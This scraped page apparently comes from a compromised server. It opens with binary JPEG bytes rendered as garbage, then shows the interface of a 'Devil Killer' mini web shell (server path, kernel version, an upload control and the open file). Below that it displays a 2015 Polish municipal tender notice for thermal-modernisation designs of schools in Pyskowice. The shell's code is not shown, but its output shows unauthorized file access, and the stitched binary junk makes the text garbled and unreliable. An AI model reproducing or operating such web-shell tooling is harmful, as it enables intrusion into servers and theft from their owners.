JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150717/106325-N-2015.html

<p class="kh_header"><b>Pyskowice: Wykonanie projektu budowlanego i wykonawczego termomodernizacji:
1.Szkoły Podstawowej nr 4 w Pyskowicach przy ul. Wojska Polskiego 23,
2.Szkoły Podstawowej nr 6 w Pyskowicach przy ul. Wyzwolenia 4,
3.Przedszkola nr 5 w Pyskowicach przy ul. Szopena 9B,
wraz z pełnieniem nadzoru autorskiego</b><br>
<b>Numer ogłoszenia: 106325 - 2015; data zamieszczenia: 17.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pyskowice , ul. Strzelców Bytomskich 3, 44-120 Pyskowice, woj. śląskie, tel. 32 3326000, faks 32 3326002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pyskowice.pl.</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu budowlanego i wykonawczego termomodernizacji:
1.Szkoły Podstawowej nr 4 w Pyskowicach przy ul. Wojska Polskiego 23,
2.Szkoły Podstawowej nr 6 w Pyskowicach przy ul. Wyzwolenia 4,
3.Przedszkola nr 5 w Pyskowicach przy ul. Szopena 9B,
wraz z pełnieniem nadzoru autorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest opracowanie dokumentacji projektowej dla zadań inwestycyjnych pn.: 
1)Termomodernizacja Szkoły Podstawowej nr 4 w w Pyskowicach przy ul. Wojska Polskiego 23,
2)Termomodernizacja Szkoły Podstawowej nr 6 w w Pyskowicach przy ul. Wyzwolenia 4,
3)Termomodernizacja Przedszkola nr 5 w Pyskowicach przy ul;. Szopena 9B, wraz z pełnieniem nadzoru autorskiego nad realizacją w/w zadań inwestycyjnych.
2.Dokumentację projektową należy opracować, oddzielnie dla każdego obiektu, w oparciu audyty energetyczne stanowiące załączniki nr 7 do 11 do niniejszej SIWZ.
3.Określenie przedmiotu zamówienia za pomocą Wspólnego Słownika Zamówień Publicznych (CPV): 71221000-3 Usługi projektowe w zakresie obiektów budowlanych, 71248000-8 nadzór nad projektem i dokumentacją (nadzór autorski).
4.Charakterystyka obiektów i parametry techniczne: 
1)Szkoła Podstawowa nr 4 w Pyskowicach składa się z trzykondygnacyjnego i podpiwniczonego budynku głównego oraz segmentu sportowego mieszczącego salę gimnastyczną. Źródłem ciepła jest miejska sieć ciepłownicza. Powierzchnia użytkowa 2 620 m2, kubatura 8 658 m3,
2)Szkoła Podstawowa nr 6 składa się ze zdylatowanych segmentów tworzących 1)cztery zasadnicze człony tj. trzykondygnacyjny, częściowo podpiwniczony budynek główny, przewiązkę parterową mieszcząca szatnię centralną oraz pomieszczenia administracyjne, parterową i częściowo podpiwniczoną część socjalną ze świetlicą, jadalnią i kuchnią z zapleczem oraz część sportową, parterową z salą gimnastyczną i zapleczem. Źródłem ciepła jest lokalna kotłownia gazowa. Planowane jest podłączenie obiektu do miejskiej sieci ciepłowniczej.  Powierzchnia użytkowa 4 445 m2, kubatura 13 448 m3,
2)Przedszkole nr 5 w Pyskowicach składa się z dwóch dwukondygnacyjnych i podpiwniczonych segmentów i łącznika. Źródłem ciepła jest miejska sieć ciepłownicza. Powierzchnia użytkowa 1 169 m2, kubatura 5 942 m3. 
2.Zamówieniem objęte jest:
1)Opracowanie dokumentacji projektowej zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej (Dz. U. Nr 202, poz. 2071 z późniejszymi zmianami), obejmującej (wg branż):
a)projekt budowlany zgodnie z Rozporządzeniem Ministra transportu, Budownictwa i Gospodarki Morskiej  z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. 4620 - w ilości 5 egz.,
b)projekty wykonawcze - w ilości 5 egz.,
c)przedmiary robót - w ilości 2 egz., zawierający dodatkową kolumnę dającą możliwość wypełnienia przez oferenta (wg branż),
d)informację dotyczącą bezpieczeństwa i ochrony zdrowia - w ilości 5 egz.,
2)Opracowanie Specyfikacji technicznej wykonania i odbioru robót budowlanych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02 września 2004 r. (Dz. U. Nr 202, poz. 2072) - w ilości 5 egz.
3)Opracowanie kosztorysów inwestorskich (wg branż) zgodnie z Rozporządzeniem Ministra infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego (Dz. U. Nr 130, poz. 13890 - w ilości 2 egz wraz z aktualizacją (wykonanie bez dodatkowego wynagrodzenia trzykrotnej aktualizacji kosztorysów inwestorskich w okresie 3 lat od daty odbioru dokumentacji technicznej),
4)Wykonanie inwentaryzacji do celów projektowych oraz uzyskanie wszelkich dokumentów, uzgodnień, opinii i decyzji niezbędnych do zgłoszenia robót lub uzyskania pozwolenia na budowę, w przypadku gdy będzie wymagane.
5)Złożenie kompletnego wniosku zgłoszenia robót budowlanych w Starostwie Powiatowym w Gliwicach lub uzyskanie prawomocnej decyzji pozwolenia na budowę, jeżeli będzie wymagana.
6)Pełnienie nadzoru autorskiego nad realizacją inwestycji.
7)Przedmiot zamówienia należy dostarczyć także w wersji elektronicznej (płyta CD).
3.Zakres opracowania.
1)Opracowanie projektu termomodernizacji obejmującego przedsięwzięcia termomodernizacyjne przewidziane do realizacji w opracowanych audytach energetycznych:
a)audyt energetyczny budynku Szkoły Podstawowej nr 4 - szczególnie pkt 8 (opis techniczny optymalnego wariantu przedsięwzięcia termomodernizacyjnego przewidzianego do realizacji), 
b)audyt energetyczny oświetlenia budynku Szkoły Podstawowej nr 4,
c)audyt energetyczny budynku Szkoły Podstawowej nr 6 - szczególnie pkt 8,
d)audyt energetyczny oświetlenia budynku Szkoły Podstawowej nr 6, e) a)audyt energetyczny budynku Przedszkola nr 5 - szczególnie pkt 8,
b)audyt energetyczny oświetlenia budynku Przedszkola nr 5.
2)Roboty budowlane związane z termomodernizacją obejmują między innymi:
a)docieplenie ścian wraz z wyprawą tynkarską i projektem kolorystyki z uwzględnieniem umieszczenia logo szkoły na wskazanej przez Zamawiającego elewacji,
b)osuszanie piwnic wraz z izolacją pionową i drenażem wokół budynku,
c)wymianę części stolarki okiennej i drzwiowej zewnętrznej,
d)ocieplenie dachów wraz z izolacją,
e)wymianę parapetów i instalacji odgromowej,
f)wymianę instalacji c.o. - dla Szkoły Podstawowej nr 6 wymianę instalacji c.o. należy wykonać w dwóch wariantach (z wymianą istniejących kotłów lub z podłączeniem do sieci miejskiej), 
g)wymianę rynien, rur spustowych i obróbek blacharskich,
h)roboty elektryczne w niezbędnym zakresie,
i)roboty konieczne po pracach budowlanych (malarskie, tynkowe, posadzkarskie, licowanie ścian itp.),
j)inne roboty konieczne wynikłe w trakcie projektowania, a niezbędne do zrealizowania.
3)Zamawiający zastrzega, by informacje zawarte w dokumentacji w zakresie technologii wykonania robót, doboru materiałów i urządzeń określały przedmiot zamówienia zgodnie z ustawą Prawo zamówień publicznych (bez używania nazw własnych, a jedynie poprzez określenie parametrów precyzujących rodzaj, standard i inne istotne elementy).
4)Przed sporządzeniem oferty Zamawiający zaleca dokonanie wizji w terenie w celu oszacowania, na własną odpowiedzialność, wszystkich niezbędnych kosztów opracowania dokumentacji oraz uzyskania wszystkich danych, jakie mogą być niezbędne do przygotowania rzetelnej oferty. Koszt dokonania wizji lokalnej ponosi Wykonawca.
5)Przedmiot zamówienia zostanie wykorzystany przez Zamawiającego do pozyskania środków UE w ramach REGIONALNEGO PROGRAMU OPERACYJNEGO WOJEWÓDZTWA ŚLĄSKIEGO NA LATA 2014-2020 DLA PODDZIAŁANIA 4.3.1 Efektywność energetyczna. W ramach przedmiotowego konkursu wskaźnikami obligatoryjnymi dla wszystkich wnioskodawców (wg Załącznika nr 2 do SZOOP RPO WSL 2014-2020 Tabela wskaźników rezultatu bezpośredniego i produktu dla działań i poddziałań) są:
wskaźniki rezultatu bezpośredniego:
a)stopień redukcji PM10,
b)ilość zaoszczędzonej energii elektrycznej,
c)ilość zaoszczędzonej energii cieplnej,
d)zmniejszenie zużycia energii końcowej w wyniku realizacji projektu,
	wskaźniki produktu:
	a) zmniejszenie rocznego zużycia energii pierwotnej w budynkach publicznych,
	b) szacowany roczny spadek emisji gazów cieplarnianych.
	W związku z powyższym w projekcie winny być określone w/w wskaźniki. 
6)Zamawiający nie dopuszcza składania ofert częściowych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie przewiduje szczegółowego opisu spełnienia tego warunku. Warunek udziału w postępowaniu będzie oceniany na podstawie oświadczenia art. 22 ust. 1 ustawy Pzp wymienionego w rozdz. VII SIWZ ust. 2 pkt 1 i pkt III.4.1) niniejszego ogłoszenia, w systemie 0-1 (zero jedynkowym) wg formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie 3 lat przed  upływem  terminu  składania  oferty,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy  to  w  tym  okresie  wykonał  należycie co  najmniej jeden projekt termomodernizacji budynku lub budynków, którego wartość wyniosła 15 000,00 zł netto (słownie: piętnaście tysięcy złotych bez podatku VAT).

Warunek udziału w postępowaniu będzie oceniany na podstawie oświadczenia art. 22 ust. 1 ustawy Pzp  wymienionego w rozdziale VII SIWZ punkt 2.1 i pkt III.4.1) niniejszego ogłoszenia,oraz dokumentu wraz z poświadczeniami, o których mowa w rozdziale VII SIWZ punkt 2.2 i pkt III.4.1) kropka 1 i 2 niniejszego ogłoszenia w systemie 0-1 (zero jedynkowym) wg formuły spełnia / nie spełnia. Z treści załączonych oświadczeń i dokumentów musi wynikać jednoznacznie, iż warunki wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie przewiduje szczegółowego opisu spełnienia tego warunku. Warunek udziału w postępowaniu będzie oceniany na podstawie oświadczenia art. 22 ust. 1 ustawy Pzp wymienionego w rozdz. VII SIWZ ust. 2 pkt 1 i pkt III.4.1) niniejszego ogłoszenia, w systemie 0-1 (zero jedynkowym) wg formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie przewiduje szczegółowego opisu spełnienia tego warunku. Warunek udziału w postępowaniu będzie oceniany na podstawie oświadczenia art. 22 ust. 1 ustawy Pzp wymienionego w rozdz. VII SIWZ ust. 2 pkt 1 i pkt III.4.1) niniejszego ogłoszenia, w systemie 0-1 (zero jedynkowym) wg formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie przewiduje szczegółowego opisu spełnienia tego warunku. Warunek udziału w postępowaniu będzie oceniany na podstawie oświadczenia art. 22 ust. 1 ustawy Pzp wymienionego w rozdz. VII SIWZ ust. 2 pkt 1 i pkt III.4.1) niniejszego ogłoszenia, w systemie 0-1 (zero jedynkowym) wg formuły spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>1)Pod pojęciem głównych usług Zamawiający rozumie usługi polegające na wykonaniu co najmniej jednego projektu termomodernizacji budynku lub budynków w zakresie niezbędnym do spełnienia warunków wiedzy i doświadczenia opisanego w rozdziale VI ust. 2 niniejszej niniejszej SIWZ tj. w okresie 3 lat przed upływem terminu składania oferty, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie wykonanie należycie przynajmniej jednego projektu termomodernizacji budynku lub budynków o wartości nie mniejszej niż 15 000,00 zł netto.
UWAGA: Należy wykazać i przedłożyć dowody wykonania usług w liczbie i przedmiocie wystarczającym do wykazania spełnienia opisanego wyżej warunku.
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, potwierdzających czy te usługi zostały wykonane lub są wykonane należycie.
Dowodami są:
a)poświadczenia,
b)oświadczenia Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym wyżej mowa.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Inne oświadczenia i dokumenty, które należy przedłożyć wraz z ofertą.
1)Oświadczenia, że Wykonawcy:
a)zapoznali się z treścią SIWZ oraz wszystkimi załącznikami stanowiącymi jej integralną cześć i nie wnoszą do nich zastrzeżeń,
b)w przypadku przyznania im zamówienia, zobowiązują się do zawarcia umowy w miejscu i terminie wskazanym przez zamawiającego na warunkach określonych we wzorze umowy stanowiącym załącznik nr 4 do SIWZ,
c)uważają się za związanych niniejszą ofertą na czas wskazany w SIWZ tj. 30 dni od daty upływu terminu składania ofert,
d)pod groźbą odpowiedzialności karnej oświadczają, że załączone do oferty dokumenty opisują stan prawny i faktyczny na dzień upływu terminu składania ofert.
Oświadczenia z ust. 6 pkt 1 należy złożyć na formularzu oferty - zgodnie z załącznikiem nr 1 do SIWZ.
2)Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, notarialnie potwierdzonej za zgodność z oryginałem.
UWAGA: Wykonawcy mogą składać wszystkie wykazy, informacje czy oświadczenia także na własnych drukach, pod warunkiem, że będą one opracowane według schematu druków załączonych do niniejszej SIWZ. W zakresie warunków udziału w postępowaniu opisanych w rozdz. VI ust. 2 do 4 SIWZ, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zobowiązanie takie należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem notarialnie lub kopii poświadczonej za zgodność z oryginałem przez podmiot udostępniający zasoby. Podmiot,  który  zobowiązał  się  do  udostępnienia  zasobów  zgodnie  z  art.  26  ust.  2b  ustawy  Pzp,  odpowiada  solidarnie  z  Wykonawcą  za  szkody  Zamawiającego  powstałe  w  skutek  nieudostępnienia  tych  zasobów,  chyba  że  za  nieudostępnienie  zasobów  nie  ponosi  winy.  
Jeżeli  Wykonawca,  wykazujący  spełnienie  warunków,  opisanych  w  rozdziale VI  SIWZ,  polega  na  zasobach  innych  podmiotów  na  zasadach  określonych powyżej  (zgodnie  z  art.  26  ust.  2b  ustawy),  Zamawiający,  w  celu  oceny,  czy Wykonawca  będzie  dysponował  zasobami  innych  podmiotów  w  stopniu niezbędnym  dla  należytego  wykonania  zamówienia  oraz  oceny,  czy  stosunek łączący  wykonawcę  z  tymi  podmiotami  gwarantuje  rzeczywisty  dostęp  do  ich zasobów,  może  żądać dokumentów  dotyczących  w  szczególności:
1)zakresu dostępnych  wykonawcy  zasobów  innego  podmiotu,
2)sposobu  wykorzystania  zasobów  innego  podmiotu,  przez  wykonawcę,  przy wykonywaniu zamówienia,
3)charakteru stosunku  jaki  będzie  łączył  wykonawcę  z  innym  podmiotem, 4)zakresu  i  okresu  udziału  innego  podmiotu  przy  wykonywaniu  zamówienia,
5)żądanie  dokumentów jw. nastąpi w przypadku, gdy wykonawca nie udowodni w wystarczający sposób dysponowania zasobami niezbędnymi dla należytego wykonania zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - termin wykonania dokumentacji projektowej - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wzór umowy stanowi załącznik nr 4 do SIWZ.
2.Zmiana wynagrodzenia wykonawcy może nastąpić w przypadku ustawowej zmiany stawki podatku VAT przez dostosowanie stawki podatku do stawki obowiązującej.
3.Zmiana terminu wykonania zamówienia może nastąpić w przypadku czasowego wstrzymania prac przez Zamawiającego, o okres na jaki prace zostały wstrzymane.
4.Nie stanowią zmiany umowy w rozumieniu art. 144 ust. 1 ustawy Prawo zamówień publicznych następujące zmiany:
1)danych związanych z obsługą administracyjno-organizacyjną Umowy, w szczególności zmiana numeru rachunku bankowego,
2)danych teleadresowych, 3)danych rejestrowych,
4)będące następstwem sukcesji uniwersalnej po jednej ze stron Umowy.
5.W przypadku wniesienia odwołania, aż do jego rozstrzygnięcia Zamawiający wstrzyma  podpisanie umowy.
6.W przypadku dokonania wyboru najkorzystniejszej oferty przez Wykonawców
wspólnie ubiegających się o udzielenie zamówienia, przed podpisaniem umowy na leży przedłożyć umowę regulującą współpracę tych podmiotów (umowa konsorcjum, umowa spółki cywilnej).       
